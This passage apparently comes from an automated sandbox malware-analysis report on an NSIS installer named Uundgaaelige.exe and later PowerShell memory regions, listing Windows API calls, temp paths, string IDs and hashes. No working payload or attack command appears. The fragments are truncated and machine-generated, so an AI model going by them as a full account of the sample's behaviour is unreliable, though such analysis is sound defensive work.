                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D81
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402D8F
                                                    • Part of subcall function 00402CDD: MulDiv.KERNEL32(00000000,00000064,00000E11), ref: 00402CF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AA6
                                                  • GetMessagePos.USER32 ref: 00404AAE
                                                  • ScreenToClient.USER32(?,?), ref: 00404AC8
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404ADA
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                  • wsprintfA.USER32 ref: 00402CB0
                                                  • SetWindowTextA.USER32(?,?), ref: 00402CC0
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                  • GlobalFree.KERNEL32(?), ref: 004027E5
                                                  • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  APIs
                                                  • lstrlenA.KERNEL32(shaharit Setup: Completed,shaharit Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                  • wsprintfA.USER32 ref: 00404A27
                                                  • SetDlgItemTextA.USER32(?,shaharit Setup: Completed), ref: 00404A3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$shaharit Setup: Completed
                                                  • API String ID: 3540041739-482455319
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D98
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                  • CreateFontIndirectA.GDI32(0040B808), ref: 00401E1A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 00401D3F
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                  • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                                                  • Instruction ID: aed907c05dc833253b389eb1df77c6bfbb772c9e61476b09ce63ef5510084725
                                                  • Opcode Fuzzy Hash: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                                                  • Instruction Fuzzy Hash: 46218F71A44209AEEB15DFA5D946AED7BB0EF84304F14803EF505F61D1DA7889408F28
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A37
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A40
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405A51
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A31
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-787714339
                                                  • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                  • Instruction ID: 868260c831235620665dea70b18de3ff29fa680cd517475ab4f5cc36a8a73f00
                                                  • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                  • Instruction Fuzzy Hash: 79D023726015303AD1127F154C05DCF1A4C8F023507050077F200B7191CB3C0D514BFE
                                                  APIs
                                                  • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405AD8
                                                  • CharNextA.USER32(00000000), ref: 00405ADD
                                                  • CharNextA.USER32(00000000), ref: 00405AF1
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsa17F6.tmp, xrefs: 00405ACB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 3213498283-223556267
                                                  • Opcode ID: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                                                  • Instruction ID: db937687bc36527a3f7147c44c8c9b1a0bf4ed848bee0725310acd997699ac17
                                                  • Opcode Fuzzy Hash: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                                                  • Instruction Fuzzy Hash: D8F0C861B14F501AFB2262640C54B776BA8CB99350F04406BD540671C286BC6C404F6A
                                                  APIs
                                                  • CloseHandle.KERNEL32(000002AC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                  • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC
                                                  • C:\Users\user\AppData\Local\Temp\nsa17F6.tmp, xrefs: 0040382D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 2962429428-631032090
                                                  • Opcode ID: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                                                  • Instruction ID: a243388e665e2d569925beaf0092b2dcbae65f1e85c6ca02b15765f08549dd2e
                                                  • Opcode Fuzzy Hash: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                                                  • Instruction Fuzzy Hash: 08E04F3250071896C620BF79AE494853B599B41735724C776F138B20F1C73899975AA9
                                                  APIs
                                                    • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405AD8
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405B72
                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0), ref: 00405B82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 3248276644-223556267
                                                  • Opcode ID: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                  • Instruction ID: f7918bca05de5a67ada1f7886cb37670742315f8bcd1f0c25b92126024abb592
                                                  • Opcode Fuzzy Hash: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                  • Instruction Fuzzy Hash: 5DF0F425205E6516C722323A0C45AAF6964CE92324709423BF891B22C3CA3CB8429DBD
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405163
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004051B4
                                                    • Part of subcall function 004041A6: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 004041B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                                                  • Instruction ID: c2e14b81eed27f6ef80c9e529a4f942fbf68e082709ee8d6c9922b6f58a3139d
                                                  • Opcode Fuzzy Hash: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                                                  • Instruction Fuzzy Hash: 7801B131900608AFEF218F41DD80F6B3676EB84750F244137FA00BA1D1C7799D929E6D
                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Uundgaaelige.exe,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405A7E
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Uundgaaelige.exe,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405A8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3443045126
                                                  • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                  • Instruction ID: 40098e637bf6d505f922d12736ff559178fc12fa7d0ee67292c12de19d06dc46
                                                  • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                  • Instruction Fuzzy Hash: 6ED0A7729089702EF30393108C00B9F6A88CF16341F090062E480A7191C67C0C424BAD
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BBF
                                                  • CharNextA.USER32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD0
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                  • Instruction ID: c0798baac460c4c161baa60e5c3960505173fe7825234d44b9ee5cd82a8c1779
                                                  • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                  • Instruction Fuzzy Hash: 29F06235105918AFCB02DFA9DD40D9EBBB8EF46350B2540B9F840FB211D674FE01ABA9
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f13e98f03838c973998257dbed4446c6243d728d4df327ff0ee8aabf0c97aec0
                                                  • Instruction ID: 64e27b54037c43eece609b8b6c84086f3b0c9c9247689bddd5a9058bb08966d1
                                                  • Opcode Fuzzy Hash: f13e98f03838c973998257dbed4446c6243d728d4df327ff0ee8aabf0c97aec0
                                                  • Instruction Fuzzy Hash: 2AB18E70E102098FDF10DFA9D88479EBBF2BF89744F148529E815EB294EB34AC45DB91
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 416077febfd818a4d2db08ebf8f516829d85424f04013c5d8931ec0377adae51
                                                  • Instruction ID: 8a124795395126eeadad8955d84fe563f52593a608f6a1e54fae5ccc37f519ea
                                                  • Opcode Fuzzy Hash: 416077febfd818a4d2db08ebf8f516829d85424f04013c5d8931ec0377adae51
                                                  • Instruction Fuzzy Hash: B2B18F70E002099FDF14DFA9C89579EBBF2BF88714F148529E815E7394EB34A885CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4[2l$4[2l$4[2l$4[2l$4[2l$4[2l$4[2l$4[2l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-657060668
                                                  • Opcode ID: f596c53cac12d6f11f5e992ffff7ba24b8d9f19ca9596b290e722a44b8daf856
                                                  • Instruction ID: d5d5acac50e0e92410a07b579c7ff8e9132dcb04bd405ac7aeb9afafc5747033
                                                  • Opcode Fuzzy Hash: f596c53cac12d6f11f5e992ffff7ba24b8d9f19ca9596b290e722a44b8daf856
                                                  • Instruction Fuzzy Hash: 27E19EB0B00209DBCB14DBA8C445AAEBBE2AF84344F14C565EA126F795CF75EC42CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e295eb6b795f97df3bc5409b01856e464c8dc5a0e61910ad2ddbcaa96f247b66
                                                  • Instruction ID: 1bdf0835e189a686225fa65b99e3058e02c34b94823dd25f9e6ca82fda68d975
                                                  • Opcode Fuzzy Hash: e295eb6b795f97df3bc5409b01856e464c8dc5a0e61910ad2ddbcaa96f247b66
                                                  • Instruction Fuzzy Hash: 9CB19A70E102099FDF10DFA8C89979EBBF2BF49714F148529E414FB294EB34A885CB91
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b59d35cb19659c856298d4017592e2c8a6d2f0c00bb2cca6cc51fd434881a67f
                                                  • Instruction ID: 3474c1bf1ef00ac2e4f3e777292dcb4944765fac6964aa9911d9d16c22654b4f
                                                  • Opcode Fuzzy Hash: b59d35cb19659c856298d4017592e2c8a6d2f0c00bb2cca6cc51fd434881a67f
                                                  • Instruction Fuzzy Hash: D8B16970E102098FDF10EFA9D88479EBBF1BF49B44F148529E815EB294EB34A845DB91
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b7420ff7a0b4b4de6e3e957fd40c32c9991be0a6fba8de48b7aa861f4e1ce3c
                                                  • Instruction ID: 3d281a40c9f15abd1811e3ce3447872e924fb2af069cf4a2dd307d677d0cd3c9
                                                  • Opcode Fuzzy Hash: 5b7420ff7a0b4b4de6e3e957fd40c32c9991be0a6fba8de48b7aa861f4e1ce3c
                                                  • Instruction Fuzzy Hash: 9E61277190F7D55FCB179B39886049ABFB0AF4721471A41CBD0C2CB1A3DA25AD09C7B2
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91b33a4e34f66b796c8d76b0d2fadb61446dd911f520903633dee4eb7bcf242f
                                                  • Instruction ID: 415b932bf3aa4e802a94489702a6321b5f6b27d66db62e9d6e9da690fc8a4508
                                                  • Opcode Fuzzy Hash: 91b33a4e34f66b796c8d76b0d2fadb61446dd911f520903633dee4eb7bcf242f
                                                  • Instruction Fuzzy Hash: 25617030A052459FCB06CF68C890AEABFF1FF49314F25859AE545DB3A2D735AC45CB90
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ee3b6e735830853bbbc4fe2c64abcf362963404bea98556a632c6a066eeee60
                                                  • Instruction ID: 82d594a4dbf49dc8eb2f9ecdf1e2127117c2d9a877949ec72a3788c61808f467
                                                  • Opcode Fuzzy Hash: 2ee3b6e735830853bbbc4fe2c64abcf362963404bea98556a632c6a066eeee60
                                                  • Instruction Fuzzy Hash: CD517135A052448FCB56CF5CC994AAEBBF2FF89310B298599E415EB391D331EC41CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  • Instruction Fuzzy Hash: 2EF129B1704349DFDB159F78C82076A7BE1BF86311F14C46AE6168B391CB35E941CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P00l$P00l$P00l$P00l$G2l$G2l
                                                  • API String ID: 0-790579512
                                                  • Opcode ID: d2b0b312adc1bb270e6e2a59c473c8e3a6ac4b72559500297972ac8ffb4cef49
                                                  • Instruction ID: 7139b2b5fb65ed7e54e6ec2ea82fb335c9b041798e63dd954d6a748992d8a894
                                                  • Opcode Fuzzy Hash: d2b0b312adc1bb270e6e2a59c473c8e3a6ac4b72559500297972ac8ffb4cef49
                                                  • Instruction Fuzzy Hash: E5D1D436700224EFCB159F68C4046AABBA2FFC4352F24846EF9569B395CB32DD41CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$4\2l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-1712132697
                                                  • Opcode ID: 9040dd21c3ad1990383ce531055621dce299b29d824b736a8b8fd173236274a4
                                                  • Instruction ID: e240b5e530df3288804bdb09ba1907d1906862dd1da14fdbbc2515ffeb34844f
                                                  • Opcode Fuzzy Hash: 9040dd21c3ad1990383ce531055621dce299b29d824b736a8b8fd173236274a4
                                                  • Instruction Fuzzy Hash: 32B12DB4A0020ADFDB14CF64C551AA9F7F2FF89314F14C56AEA166B754C736A842CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P00l$P00l$P00l$P00l$G2l$G2l
                                                  • API String ID: 0-790579512
                                                  • Opcode ID: 04da5078f5678da07aa7ba9af5737ee948a08037f9371eea836ba906af2b699b
                                                  • Instruction ID: 483318a427586360e361398eff2b6aa7d5b90d131a07ebd59e6e91a21c47f028
                                                  • Opcode Fuzzy Hash: 04da5078f5678da07aa7ba9af5737ee948a08037f9371eea836ba906af2b699b
                                                  • Instruction Fuzzy Hash: B891E476B00624DFCB14DB58C404AAABBE2BFC8316F25C46DE9169B385CB31DD42CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4\2l$4\2l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-1940569027
